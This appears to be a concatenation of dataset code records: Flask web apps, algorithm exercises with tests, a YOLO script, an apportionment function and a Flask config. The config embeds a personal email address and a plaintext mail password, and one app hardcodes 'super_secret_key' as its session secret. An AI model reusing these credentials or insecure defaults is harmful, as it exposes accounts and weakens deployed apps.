return redirect(url_for('showItem', category_name=category.name,\n            category_id=category.id, item_title=newItem.title,\n            item_id=newItem.id))\n    else:\n        return render_template('newitem.html', categories = categories)\n\n\n# Role required user- creator\n# \"This page is for editing Item %s\" % 
item_id\n@app.route('/catalog//<category_name>/<int:category_id>/<item_title>/<int:item_id>/edit', methods = ['GET', 'POST'])\n#@login_required\ndef editItem(category_name, category_id, item_title, item_id):\n \"\"\"Edit the details of the specified item.\n Returns a GET with edititem.html - form with inputs to edit item info\n if I get a post - redirect to 'showCategory' after updating item info.\n \"\"\"\n # ADD LOGIN PERMISSION\n # If a user name is not detected for a given request.\n # Lets redirect to login page.\n if 'username' not in login_session:\n return redirect('/login')\n # Add SQLAlchemy statements\n categories = session.query(Category).all()\n\n try:\n category = session.query(Category).\\\n filter_by(id = category_id).one_or_none()\n except None: # If a NoneType object is returned\n return PageNotFound\n\n try:\n editedItem = session.query(Item).filter_by(\n id = item_id).one_or_none()\n except None:\n # If a NoneType object is returned\n return PageNotFound\n return redirect(url_for('showCatalog'))\n\n # To protect each item based on whoever created it.\n creator = getUserInfo(editedItem.user_id)\n\n\n # ADD ALERT MESSAGE TO PROTECT.\n # If a user isn't logged in or isn't the original creator\n if 'username' not in login_session or creator.id !=login_session['user_id']:\n return \"<script>function myFunction() {alert('You are not authorized to edit this item. Please create your own item in order to edit items.');}</script><body onload='myFunction()'>\"\n\n\n if request.method == 'POST':\n # This is key to retreiving the category from the form.\n category = (session.query(Category).filter_by(\n name= request.form.get('category')).one())\n if request.form['title']:\n editedItem.title = request.form['title']\n if request.form['description']:\n editedItem.description = request.form['description']\n if request.form['price']:\n editedItem.price = request.form['price']\n if request.files['file']:\n editedItem.image_filename = request.files['file']\n\n # Process optional item image\n image_file = request.files['file']\n if image_file and allowed_file(image_file.filename):\n if editedItem.image_filename:\n delete_image(editedItem.image_filename)\n filename = secure_filename(image_file.filename)\n if os.path.isdir(app.config['UPLOAD_FOLDER']) is False:\n os.mkdir(app.config['UPLOAD_FOLDER'])\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n editedItem.image_filename = filename\n editedItem.basic_url = None\n\n elif ('delete_image' in request.form and\n request.form['delete_image'] == 'delete'):\n if editedItem.image_filename:\n delete_image(editedItem.image_filename)\n\n if not image_file and request.form['basic_url']:\n editedItem.basic_url = request.form['basic_url']\n if editedItem.image_filename:\n delete_image(editedItem.image_filename)\n\n\n session.add(editedItem)\n session.commit()\n flash('Item Successfully Edited')\n return redirect(url_for('showCategory', category_name=category_name,\n category_id = category_id))\n else:\n return render_template('edititem.html', category = category,\n categories = categories,\n item = editedItem)\n\n# Role required: User creator\n# \"This page is for deleting Item %s\" %item_id\n@app.route('/catalog/<category_name>/<int:category_id>/<item_title>/<int:item_id>/delete', methods = ['GET', 'POST'])\n#@login_required\ndef deleteItem(category_name, category_id, item_title, item_id):\n # Add SQLAlchemy statements\n \"\"\"Delete a specified item from the database.\n Returns:\n GET: deleteitem.html - form for confirmation 
prior to deletion of item.\n    POST: if I get a post -redirect to 'showCategory' after item info deletion.\n    \"\"\"\n    # ADD LOGIN PERMISSION\n    # If a user name is not detected for a given request.\n    # Lets redirect to login page.\n    if 'username' not in login_session:\n        return redirect('/login')\n    # filter_by uses the names of the columns in a table\n    try:\n        category = session.query(Category).\\\n            filter_by(id = category_id).one_or_none()\n    except None: # If a NoneType object is returned\n        return PageNotFound\n\n    try:\n        itemToDelete = session.query(Item).filter_by(\n            id =item_id).one_or_none()\n    except None: # If a NoneType object is returned\n        return PageNotFound\n\n    creator = getUserInfo(itemToDelete.user_id)\n    # ADD ALERT MESSAGE TO PROTECT.\n    # If a user isn't logged in or isn't the original creator\n    if 'username' not in login_session or creator.id !=login_session['user_id']:\n        return \"<script>function myFunction() {alert('You are not authorized to delete this item. Please create your own item in order to delete items.');}</script><body onload='myFunction()'>\"\n    if request.method == 'POST':\n        session.delete(itemToDelete)\n        session.commit()\n        flash('Item Successfully Deleted')\n        return redirect(url_for('showCategory',\n                    category_name = category_name,\n                    category_id =category_id))\n    else:\n        return render_template('deleteitem.html', category = category,\n                        item = itemToDelete)\n\n\n@app.route('/logout')\n#@login_required\ndef disconnect():\n    \"\"\"Checks if the provider has been set in login_session\"\"\"\n\n    if 'provider' in login_session:\n        if login_session['provider'] == 'google':\n            gdisconnect()\n            del login_session['gplus_id']\n            del login_session['access_token']\n        if login_session['provider'] == 'facebook':\n            fbdisconnect()\n            del login_session['facebook_id']\n        del login_session['username']\n        del login_session['email']\n        del login_session['picture']\n        del login_session['user_id']\n        del login_session['provider']\n        flash(\"You have successfully been logged out.\")\n        return redirect(url_for('showCatalog'))\n    else:\n        flash(\"You were not logged in\")\n        return redirect(url_for('showCatalog'))\n\n\n@app.route('/item_images/<filename>')\ndef show_item_image(filename):\n    \"\"\"Route to serve user uploaded images.\n    Args:\n        filename (str): Filename of the image to serve to the client.\n    \"\"\"\n    return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\nif __name__ == '__main__':\n    app.secret_key = 'super_secret_key'\n    # app.debug = True\n    # app.run(ssl_context='adhoc')\n    # app.run(threaded=False)\n    app.run(host = '0.0.0.0', port = 8000)\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":35329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"269815030","text":"#coding=utf-8\n\nimport unittest\nfrom util.tree_node import TreeNode\n\n\"\"\"\nFlatten a binary tree to a fake \"linked list\" in pre-order traversal.\n\nHere we use the right pointer in TreeNode as the next pointer in ListNode.\n\n    Notice\n\nDon't forget to mark the left child of each node to null. Or you will get Time Limit Exceeded or Memory Limit Exceeded.\n\nHave you met this question in a real interview? 
Yes\nExample\n 1\n \\\n 1 2\n / \\ \\\n 2 5 => 3\n / \\ \\ \\\n 3 4 6 4\n \\\n 5\n \\\n 6\nChallenge \nDo it in-place without any extra memory.\n\nTags \nBinary Tree Depth First Search\nRelated Problems \nMedium Flatten 2D Vector 46 %\nMedium Flatten Nested List Iterator 27 %\nMedium Convert Binary Search Tree to Doubly Linked List 29 %\nMedium Convert Sorted List to Balanced BST\n\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\n\n\nclass Solution: # 29% cases passed, locally : RuntimeError: maximum recursion depth exceeded\n # @param root: a TreeNode, the root of the binary tree\n # @return: nothing\n def flatten_ref(self, root): # ref, use stack, step into and try to understand how it works\n \"\"\"\n Impression is that the current node 's right will be the stack top element.\n :param root: \n :return: \n \"\"\"\n if not root:\n return None\n stack = [root]\n while stack:\n node = stack.pop()\n if node.right:\n stack.append(node.right)\n if node.left:\n stack.append(node.left)\n node.left = None\n if stack:\n node.right = stack[-1]\n else:\n node.right = None\n\n\n def flatten2(self, root): # ref jiuzhang idea\n # write your code here\n if not root:\n return\n self.flatten(root.left)\n self.flatten(root.right)\n cur = root.left\n if cur:\n # while cur.left: #wrong, already flatten, should be right\n # cur = cur.left\n while cur.right:\n cur = cur.right\n cur.right = root.right\n root.right = root.left\n root.left = None\n\n\n def flatten1(self, root):\n # write your code here\n if not root:\n return\n self.pre_dfs(root)\n\n def pre_dfs(self, root):\n if not root:\n return None, None\n right = root.right\n tail = root\n if root.left:\n lhead, ltail = self.pre_dfs(root.left)\n root.right = lhead\n ltail.right = right\n tail = ltail\n root.left = None\n if right:\n # rhead, rtail = self.pre_dfs(root.right) # wrong to say root.right here, already modified, should be right\n rhead, rtail = self.pre_dfs(right)\n tail.right = rhead\n tail = rtail\n return root, tail\n\n\nclass SolutionTester(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_case2(self):\n nums = [1,2]\n root = TreeNode.generate_bt_from_list(nums)\n answer = [1,2]\n self.sol.flatten(root)\n result = TreeNode.get_tree_right_list(root)\n self.assertEqual(answer, result)\n\n def test_case1(self):\n nums = [1,2,5,3,4,None, 6]\n root = TreeNode.generate_bt_from_list(nums)\n answer = [1,2,3,4,5,6]\n self.sol.flatten(root)\n result = TreeNode.get_tree_right_list(root)\n self.assertEqual(answer, result)\n\n\n def test_case11(self): #===>\n nums = \"98,97,#,88,#,84,#,79,87,64,#,#,#,63,69,62,#,#,#,30,#,27,59,9,#,#,#,3,#,0,#,-4,#,-16,#,-18,-7,-19,#,#,#,-23,#,-34,#,-42,#,-59,#,-63,#,-64,#,-69,#,-75,#,-81\"\n answer = \"98,#,97,#,88,#,84,#,79,#,64,#,63,#,62,#,30,#,27,#,9,#,3,#,0,#,-4,#,-16,#,-18,#,-19,#,-23,#,-34,#,-42,#,-59,#,-63,#,-64,#,-69,#,-75,#,-81,#,-7,#,59,#,69,#,87\"\n from util.tree_node import TreeNode\n root = TreeNode.generate_bt_from_string_standard(nums)\n answer_tree = TreeNode.generate_bt_from_string_standard(answer)\n self.sol.flatten(root)\n compare = TreeNode.compare_tree(root, answer_tree)\n self.assertTrue(compare)\n\n\ndef main():\n suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n#-*- coding:utf-8 -*-\n\n\"\"\"\n\njiuzhang answer: \n\n\nclass Solution:\n # @param root: a 
TreeNode, the root of the binary tree\n    # @return: nothing\n    def flatten(self, root):\n        # write your code here\n        if root == None:\n            return\n        self.flatten(root.left)\n        self.flatten(root.right)\n        p = root\n        if p.left == None:\n            return\n        p = p.left\n        while p.right:\n            p = p.right\n        p.right = root.right\n        root.right = root.left\n        root.left = None\n\n\n====================================================================================\n\njiuzhang Java version\n\n    /**\n     * This code is provided by the Jiuzhang Algorithm editorial team. All rights reserved; please credit the source when re-posting.\n     * - Jiuzhang Algorithm is dedicated to helping more Chinese people find good jobs; its teaching team consists of working engineers from Silicon Valley and leading companies in China.\n     * - Current interview training courses include: the Jiuzhang Algorithm class, System Design class, Algorithm Intensive class, Java Introduction and Basic Algorithms class, Android Project Practice class, and Big Data Project Practice class.\n     * - For more details, see the official website: http://www.jiuzhang.com/?source=code\n     */ \n\n// Version 1: Traverse\npublic class Solution {\n    private TreeNode lastNode = null;\n\n    public void flatten(TreeNode root) {\n        if (root == null) {\n            return;\n        }\n\n        if (lastNode != null) {\n            lastNode.left = null;\n            lastNode.right = root;\n        }\n\n        lastNode = root;\n        TreeNode right = root.right;\n        flatten(root.left);\n        flatten(right);\n    }\n}\n\n// version 2: Divide & Conquer\npublic class Solution {\n    /**\n     * @param root: a TreeNode, the root of the binary tree\n     * @return: nothing\n     */\n    public void flatten(TreeNode root) {\n        helper(root);\n    }\n    \n    // flatten root and return the last node\n    private TreeNode helper(TreeNode root) {\n        if (root == null) {\n            return null;\n        }\n        \n        TreeNode leftLast = helper(root.left);\n        TreeNode rightLast = helper(root.right);\n        \n        // connect leftLast to root.right\n        if (leftLast != null) {\n            leftLast.right = root.right;\n            root.right = root.left;\n            root.left = null;\n        }\n        \n        if (rightLast != null) {\n            return rightLast;\n        }\n        \n        if (leftLast != null) {\n            return leftLast;\n        }\n        \n        return root;\n    }\n}\n\n// version 3: Non-Recursion\n/**\n * Definition of TreeNode:\n * public class TreeNode {\n *     public int val;\n *     public TreeNode left, right;\n *     public TreeNode(int val) {\n *         this.val = val;\n *         this.left = this.right = null;\n *     }\n * }\n */\npublic class Solution {\n    /**\n     * @param root: a TreeNode, the root of the binary tree\n     * @return: nothing\n     */\n    public void flatten(TreeNode root) {\n        if (root == null) {\n            return;\n        }\n        \n        Stack<TreeNode> stack = new Stack<>();\n        stack.push(root);\n        \n        while (!stack.empty()) {\n            TreeNode node = stack.pop();\n            if (node.right != null) {\n                stack.push(node.right);\n            }\n            if (node.left != null) {\n                stack.push(node.left);\n            }\n            \n            // connect \n            node.left = null;\n            if (stack.empty()) {\n                node.right = null;\n            } else {\n                node.right = stack.peek();\n            }\n        }\n    }\n}\n\n\n\n\n\"\"\"\n\n\n\n\n","sub_path":"mjbeto/flatten_binary_tree to_linked_list.py","file_name":"flatten_binary_tree to_linked_list.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"334903810","text":"import sys\nimport os\nimport argparse\nfrom yolo import YOLO, detect_video\nfrom PIL import Image\nimport numpy as np\n\ndef detect_img(yolo, input_path, output_path='predict.txt'):\n    if input_path == '':\n        while True:\n            img = input('Input image filename:')\n            try:\n                image = Image.open(img)\n            except:\n                print('Open Error! 
Try again!')\n                continue\n            else:\n                r_image, _, _, _ = yolo.detect_image(image)\n                r_image.show()\n    else:\n        if output_path == \"\":\n            output_path='predict.txt'\n\n        list_image = []\n\n        if os.path.isfile(input_path):\n            with open(input_path, 'r') as f:\n                lines = f.readlines()\n                for line in lines:\n                    list_image.append(line.split()[0])\n        elif os.path.isdir(input_path):\n            for file in os.listdir(input_path):\n                if file.endswith(\".jpg\"):\n                    list_image.append(os.path.join(input_path, file))\n        else:\n            print(\"Input path is invalid\")\n            yolo.close_session()\n            return\n\n        f = open(output_path, 'w')\n        for img in list_image:\n            print(\"Process \" + img)\n            try:\n                image = Image.open(img)\n            except:\n                print('Open Error! Try again!')\n                continue\n            else:\n                line = img\n                _, r_out_boxes, r_out_scores, r_out_classes = yolo.detect_image(image)\n\n                for i in range(len(r_out_boxes)):\n                    top, left, bottom, right = r_out_boxes[i]\n                    top = max(0, np.floor(top + 0.5).astype('int32'))\n                    left = max(0, np.floor(left + 0.5).astype('int32'))\n                    bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n                    right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n\n                    line += ' {},{},{},{},{},{},{}'.format(top, left, bottom, right,\n                                                           r_out_scores[i],\n                                                           r_out_classes[i],\n                                                           yolo.class_names[r_out_classes[i]])\n                f.write(line + '\\n')\n\n        f.close()\n\n    yolo.close_session()\n\nFLAGS = None\n\nif __name__ == '__main__':\n    # class YOLO defines the default value, so suppress any default here\n    parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)\n    '''\n    Command line options\n    '''\n    parser.add_argument(\n        '--model_path', type=str,\n        help='path to model weight file, default ' + YOLO.get_defaults(\"model_path\")\n    )\n\n    parser.add_argument(\n        '--anchors_path', type=str,\n        help='path to anchor definitions, default ' + YOLO.get_defaults(\"anchors_path\")\n    )\n\n    parser.add_argument(\n        '--classes_path', type=str,\n        help='path to class definitions, default ' + YOLO.get_defaults(\"classes_path\")\n    )\n\n    parser.add_argument(\n        '--gpu_num', type=int,\n        help='Number of GPU to use, default ' + str(YOLO.get_defaults(\"gpu_num\"))\n    )\n\n    parser.add_argument(\n        \"--font_path\", type=str,\n        help='path to font, default ' + YOLO.get_defaults(\"font_path\")\n    )\n\n    parser.add_argument(\n        '--image', default=False, action=\"store_true\",\n        help='Image detection mode, will ignore all positional arguments'\n    )\n    '''\n    Command line positional arguments -- for video detection mode\n    '''\n    parser.add_argument(\n        \"--input\", nargs='?', type=str,required=False,default='',\n        help = \"Video input path\"\n    )\n\n    parser.add_argument(\n        \"--output\", nargs='?', type=str, default=\"\",\n        help = \"[Optional] Video output path\"\n    )\n\n    FLAGS = parser.parse_args()\n\n    if FLAGS.image:\n        \"\"\"\n        Image detection mode, disregard any remaining command line arguments\n        \"\"\"\n        print(\"Image detection mode\")\n        if \"input\" in FLAGS:\n            print(\" Ignoring remaining command line arguments: \" + FLAGS.input + \",\" + FLAGS.output)\n        detect_img(YOLO(**vars(FLAGS)), FLAGS.input, FLAGS.output)\n    elif \"input\" in FLAGS:\n        detect_video(YOLO(**vars(FLAGS)), FLAGS.input, FLAGS.output)\n    else:\n        print(\"Must specify at least video_input_path. 
See usage with --help.\")\n","sub_path":"yolo_video.py","file_name":"yolo_video.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92783416","text":"\"\"\"\nCreated By : Prasad Pingle\nCreated At : 26 June 2019\nDescription : This is sample flask application with sample API \n to get company details and create logo\nDependancies: Data file \"data/CompaniesList.json\" which contains company details.\n\"\"\"\n\nfrom flask import Flask, request, jsonify, render_template,send_file\nimport json\nimport os\nimport pprint\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n\"Configuration for LOGO LETTERS as alphanumeric only or alphanumeric plus characters (COMMENT ONE OF THE BELOW LINE)\"\nCONST_COMPANY_LETTERS = \"ALPHANUM\"\n# CONST_COMPANY_LETTERS = \"ALPHANUM+SPECIAL\"\n\n\n# Defining the data source for the company details\ndata_source = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"data/CompaniesList.json\")\n\n\n# Function read_json_data() : reading the data from json file\n# Created By: Prasad Pingle 30/06/2019\ndef read_json_data(data_source):\n try:\n fp = open(data_source, encoding=\"utf8\") #reading the file in UTF-8 format\n data = json.loads(fp.read())\n return data\n except:\n return jsonify(\"Cannot read file\")\n\n# Function get_all_company_logos() : generating the company logos for all files and passing the generated file for download\n# Created By: Prasad Pingle 30/06/2019\n@app.route('/api/v1/resources/getCompanyLogo/<company_id>', methods=['GET'])\ndef get_company_logo(company_id):\n company_details = read_json_data(data_source)\n company_id = company_id.upper() #Converting to uppercase for handling as IDs are stored in uppercase format in JSON file (CONFIGURABLE)\n try:\n for company_ctr in range(len(company_details)):\n if ('Company Name' in company_details[company_ctr] and 'CompanyId' in company_details[company_ctr] \n and company_details[company_ctr]['CompanyId'] == company_id):\n company_name = company_details[company_ctr]['Company Name'].strip().lower()\n alpha_sort = ''.join(sorted(company_name)) #Sorting the name alphabetically\n if len(alpha_sort) > 0:\n occurence_obj = {}\n occurence_obj = check_occurence(str(alpha_sort))\n logo = generate_logo(occurence_obj)\n company_details[company_ctr]['logoCharacters'] = \",\".join(logo)\n print(\"LOGO\",company_details[company_ctr]['logoCharacters'])\n break\n logo_details = {}\n logo_details['companyId'] = company_details[company_ctr]['CompanyId']\n logo_details['companyName'] = company_details[company_ctr]['Company Name']\n logo_details['companyLogo'] = company_details[company_ctr]['logoCharacters']\n\n return render_template('view_logo.html', companyDetails = logo_details)\n except:\n return render_template('create_logo.html', companyDetails = \"Please enter valid ID\")\n\n\n# Function check_occurence() : checking the occurence of each letter in the company name and returning the object\n# Created By: Prasad Pingle 30/06/2019\ndef check_occurence(str):\n occurence = {}\n for c in str:\n try:\n if CONST_COMPANY_LETTERS == \"ALPHANUM\": #CONFIGURABLE \n if c != \" \" and c.isalnum() == True: #Ignoring the whitespaces as well as special characters\n occurence[c] = str.count(c)\n elif CONST_COMPANY_LETTERS == \"ALPHANUM+SPECIAL\": #CONFIGURABLE\n if c != \" \": #Ignoring the whitespaces but allowing special characters\n occurence[c] = str.count(c)\n except:\n continue\n return occurence\n\n# Function 
generate_logo() : generating the logo for each company name\n# Created By: Prasad Pingle 30/06/2019\ndef generate_logo(occurence_obj):\n occ_keys = []\n occ_values = []\n occ_keys = list(occurence_obj.keys()) # separating the keys from occurence_obj\n occ_values = list(occurence_obj.values()) # separating the values from occurence_obj\n logo = []\n if len(occ_values) > 0:\n for counter in range(len(occ_values)):\n try:\n max_occ = max(occ_values)\n max_element_index = occ_values.index(max_occ)\n letter = occ_keys[max_element_index]\n logo.append(letter.upper()) #capitalizing the letter\n occ_keys.pop(max_element_index) #removing the maximum element\n occ_values.pop(max_element_index)\n if counter == 2:\n break\n except:\n continue\n return logo\n\n\n# Function create_output_file() : create an output file for logo details(FUTURE SCOPE)\n# Created By: Prasad Pingle 30/06/2019\ndef create_output_file(company_details):\n formatted_company_details = json.dumps(company_details, indent=4)\n f = open(\"company_logo.json\", \"w\")\n f.write((format(formatted_company_details)))\n f.close()\n return formatted_company_details\n \n# Homepage for downloading the company logo file\n# Created By: Prasad Pingle 30/06/2019\n@app.route('/')\ndef index():\n return render_template('create_logo.html')\n\n# Running the application on localhost:8888\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8888)\n\n#Handling for invalid routes\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('create_logo.html', companyDetails = \"Please enter a Id\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"138474583","text":"import pytest\nfrom django.shortcuts import reverse\nfrom django.db import transaction\n\nfrom topobank.manager.tests.utils import SurfaceFactory, Topography1DFactory, UserFactory\nfrom topobank.analysis.tests.utils import TopographyAnalysisFactory\nfrom topobank.analysis.models import Analysis, AnalysisCollection\nfrom topobank.manager.utils import subjects_to_json\n\n\n@pytest.mark.django_db\ndef test_submit_analyses_api(client, test_analysis_function, handle_usage_statistics):\n \"\"\"Test API to submit new analyses.\"\"\"\n\n user = UserFactory()\n surface = SurfaceFactory(creator=user)\n topo1 = Topography1DFactory(surface=surface)\n topo2 = Topography1DFactory(surface=surface)\n\n func = test_analysis_function\n\n client.force_login(user)\n\n with transaction.atomic():\n # trigger \"recalculate\" for two topographies\n response = client.post(reverse('analysis:card-submit'), {\n 'function_id': func.id,\n 'subjects_ids_json': subjects_to_json([topo1, topo2]),\n 'function_kwargs_json': '{}'\n }, HTTP_X_REQUESTED_WITH='XMLHttpRequest') # we need an AJAX request\n assert response.status_code == 200\n\n #\n # Analysis objects should be there and marked for the user\n #\n analysis1 = Analysis.objects.get(function=func, topography=topo1)\n analysis2 = Analysis.objects.get(function=func, topography=topo2)\n\n assert user in analysis1.users.all()\n assert user in analysis2.users.all()\n\n #\n # Don't know yet how execute tasks locally without task queue\n # Celery's \"task_always_eager\" is not suitable for unit testing.\n #\n #\n # assert analysis1.task_state == 'su'\n # assert analysis2.task_state == 'su'\n #\n # #\n # # Collection object should be there and contain those analyses\n # #\n # collection = 
AnalysisCollection.objects.get(owner=user)\n #\n # assert collection.analyses.count() == 2\n # assert analysis1 in collection.analyses.all()\n # assert analysis2 in collection.analyses.all()\n #\n # #\n # # Notification should be there, since the task has already performed\n # #\n # note = Notification.objects.get(recipient=user, description__contains=\"Tasks finished\")\n # assert note.href == reverse('analysis:collection', kwargs=dict(collection_id=collection.id))\n\n\n@pytest.mark.django_db\ndef test_renew_analyses_api(client, test_analysis_function):\n \"\"\"Test whether existing analyses can be renewed by API call.\"\"\"\n\n user = UserFactory()\n surface = SurfaceFactory(creator=user)\n topo1 = Topography1DFactory(surface=surface)\n topo2 = Topography1DFactory(surface=surface)\n\n func = test_analysis_function\n\n analysis1a = TopographyAnalysisFactory(subject=topo1, function=func)\n analysis2a = TopographyAnalysisFactory(subject=topo2, function=func)\n\n client.force_login(user)\n\n with transaction.atomic():\n # trigger \"renew\" for two specific analyses\n response = client.post(reverse('analysis:renew'), {\n 'analyses_ids[]': [analysis1a.id, analysis2a.id],\n }, HTTP_X_REQUESTED_WITH='XMLHttpRequest') # we need an AJAX request\n assert response.status_code == 200\n\n #\n # Old analyses should be deleted\n #\n with pytest.raises(Analysis.DoesNotExist):\n Analysis.objects.get(id=analysis1a.id)\n with pytest.raises(Analysis.DoesNotExist):\n Analysis.objects.get(id=analysis2a.id)\n\n #\n # New Analysis objects should be there and marked for the user\n #\n analysis1b = Analysis.objects.get(function=func, topography=topo1)\n analysis2b = Analysis.objects.get(function=func, topography=topo2)\n\n assert user in analysis1b.users.all()\n assert user in analysis2b.users.all()\n\n\n\n","sub_path":"topobank/analysis/tests/test_recalculate.py","file_name":"test_recalculate.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"587958356","text":"import math\n\n\ndef calculate_adam(num_seats, populations):\n \"\"\"\n Calculate the initial fair shares, final fair shares, initial quotas, final quotas, initial divisor, and modified\n divisor using Adam's method of apportionment.\n\n :return: A list of initial fair shares, final fair shares, initial quotas, final quotas, initial divisor, \n and modified divisor. 
\n    \"\"\"\n\n    # Record the divisors tried along the way.\n    estimated_divisors = []\n\n    # The number of states to apportion to.\n    num_states = len(populations)\n\n    # The initial divisor.\n    initial_divisor = sum(populations) / num_seats\n    estimated_divisors.append(initial_divisor)\n\n    # The original state quotas respectively.\n    initial_quotas = []\n    for i, population in enumerate(populations):\n        initial_quotas.append(population / initial_divisor)\n\n    # The initial state fair shares respectively.\n    initial_fair_shares = []\n    for i, quota in enumerate(initial_quotas):\n        initial_fair_shares.append(math.ceil(quota))\n\n    # Initialize the final quota list.\n    final_quotas = []\n\n    # Initialize the modified divisor variable.\n    # At this point, the modified divisor is the same as the original divisor value.\n    modified_divisor = sum(populations) / num_seats\n\n    # Calculate the original quota values.\n    # At this point, the final quotas list is the same as the original quotas list.\n    for i, population in enumerate(populations):\n        final_quotas.append(population / modified_divisor)\n\n    # Initialize the final fair shares list to a list of zeros.\n    final_fair_shares = [0] * num_states\n\n    # Step size used to adjust the divisor when the seats need to be reapportioned.\n    estimator = sum(populations) / num_seats\n\n    # Iteration counter used to break from the loop if apportionment is impossible.\n    time_keeper = 0\n\n    # Start the apportionment process.\n    while sum(final_fair_shares) != num_seats:\n        if time_keeper == 5000:\n            break\n        for i, quota in enumerate(final_quotas):\n            final_fair_shares[i] = math.ceil(quota)\n\n        # Recalculate the divisor if the seats are not fully apportioned.\n        if sum(final_fair_shares) != num_seats:\n\n            # Too many seats were handed out, so the divisor is too small: increase it.\n            if sum(final_fair_shares) > num_seats:\n                modified_divisor += estimator\n\n            # Too few seats were handed out, so the divisor is too large: decrease it.\n            else:\n                modified_divisor -= estimator\n\n            # Halve the step size (a bisection search) so the divisor converges instead of oscillating.\n            estimator = estimator / 2\n\n            # The modified divisor can never be 0 (prevents a divide-by-zero error).\n            if modified_divisor == 0:\n                modified_divisor = 1\n\n            # Recalculate the quotas with the updated modified divisor.\n            for i, population in enumerate(populations):\n                final_quotas[i] = population / modified_divisor\n\n            # Reapportion the seats to states given the set of new quotas.\n            for i, quota in enumerate(final_quotas):\n                final_fair_shares[i] = math.ceil(quota)\n\n            # Save the updated divisor.\n            estimated_divisors.append(modified_divisor)\n\n        time_keeper += 1\n\n    # If the loop didn't converge, apportionment failed; raise instead of returning bogus values.\n    if time_keeper == 5000:\n        raise Exception(\"Incalculable values.\")\n\n    # Return the initial/final fair shares and quotas, plus the initial, modified and estimated divisors.\n    else:\n        return initial_fair_shares, final_fair_shares, initial_quotas, final_quotas, initial_divisor, \\\n            modified_divisor, estimated_divisors\n","sub_path":"apportionpy/methods/adam.py","file_name":"adam.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"74170740","text":"\"\"\"\n\tConfiguration will be set up as an object named \"Config\" with a list\n    of attributes or members as config variables\n\"\"\"\nimport os\nimport pickle\nbasedir = os.path.abspath(os.path.dirname(__file__))\nfrom webapp.models import Mlmodel\n\"\"\"\nbasedir 
is:\n.../DIPLOMADO-UPEL-EducacionUniversitaria/TEMAS-o-AREAS/COMPUTER-SCIENCE/EJEMPLOS/PYTHON/FLASK/sentimentpredictor\n\"\"\"\n#print(\"Base dir is: {}\".format(basedir))\nclass Config(object):\n    \"\"\" If no OS environment variable is set, SECRET_KEY will assume the hardcoded string as its value \"\"\"\n    SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'\n    \"\"\"\n\tThe location of the application's database. If the DATABASE_URL environment variable is not set,\n\tthen a default local database location would be used here.\n    \"\"\"\n    \"\"\"\n    MAIL_SERVER = os.environ.get('MAIL_SERVER') or 'smtp.gmail.com'\n    MAIL_PORT = int(os.environ.get('MAIL_PORT') or 465 )\n    MAIL_USE_SSL = os.environ.get('MAIL_USE_SSL') or True\n    #MAIL_USE_TLS = int(os.environ.get('MAIL_USE_TLS') or 1)#\n    MAIL_USERNAME = os.environ.get('MAIL_USERNAME') or 'victor.liendo@gmail.com'\n    MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD') or 'Jwl10_c3sar'\n    ADMINS = ['victor.liendo@gmail.com']\n    \"\"\"\n    \"\"\" For email management during the development phase,\n\t\tDEBUG MODE MUST BE SET TO 0, and the FAKE email server must be running:\n\t\tpython -m smtpd -n -c DebuggingServer localhost:8025\n    \"\"\"\n\n    MAIL_SERVER = os.environ.get('MAIL_SERVER') or 'localhost'\n    MAIL_PORT = int(os.environ.get('MAIL_PORT') or 8025)\n    ADMINS = ['victor.liendo@gmail.com']\n    print(\"Hello! Base dir is: {}\".format(basedir))\n    \"\"\"THE PREVIOUSLY SAVED ML MODEL\"\"\"\n    MODEL = pickle.load(open(os.path.join(basedir, 'ML-model/LR-with-CountVectorizer-for-SentimentAnalisis.pkl'), 'rb'))\n    VECTOR = pickle.load(open(os.path.join(basedir, 'ML-model/CountVectorizer-vector.pkl'), 'rb'))\n    APPMODEL=Mlmodel(MODEL,VECTOR)\n    print(APPMODEL.get_model_type())\n    print(APPMODEL.get_vector_type())\n","sub_path":"sentimentpredictor/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"212408315","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport glob\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom sklearn.model_selection import KFold\nimport lightgbm as lgb\nimport requests\nfrom sklearn.model_selection import StratifiedKFold\nfrom lightgbm.sklearn import LGBMClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import roc_auc_score, f1_score,mean_squared_error,explained_variance_score\nfrom scipy.stats import entropy, kurtosis\nfrom sklearn.ensemble import 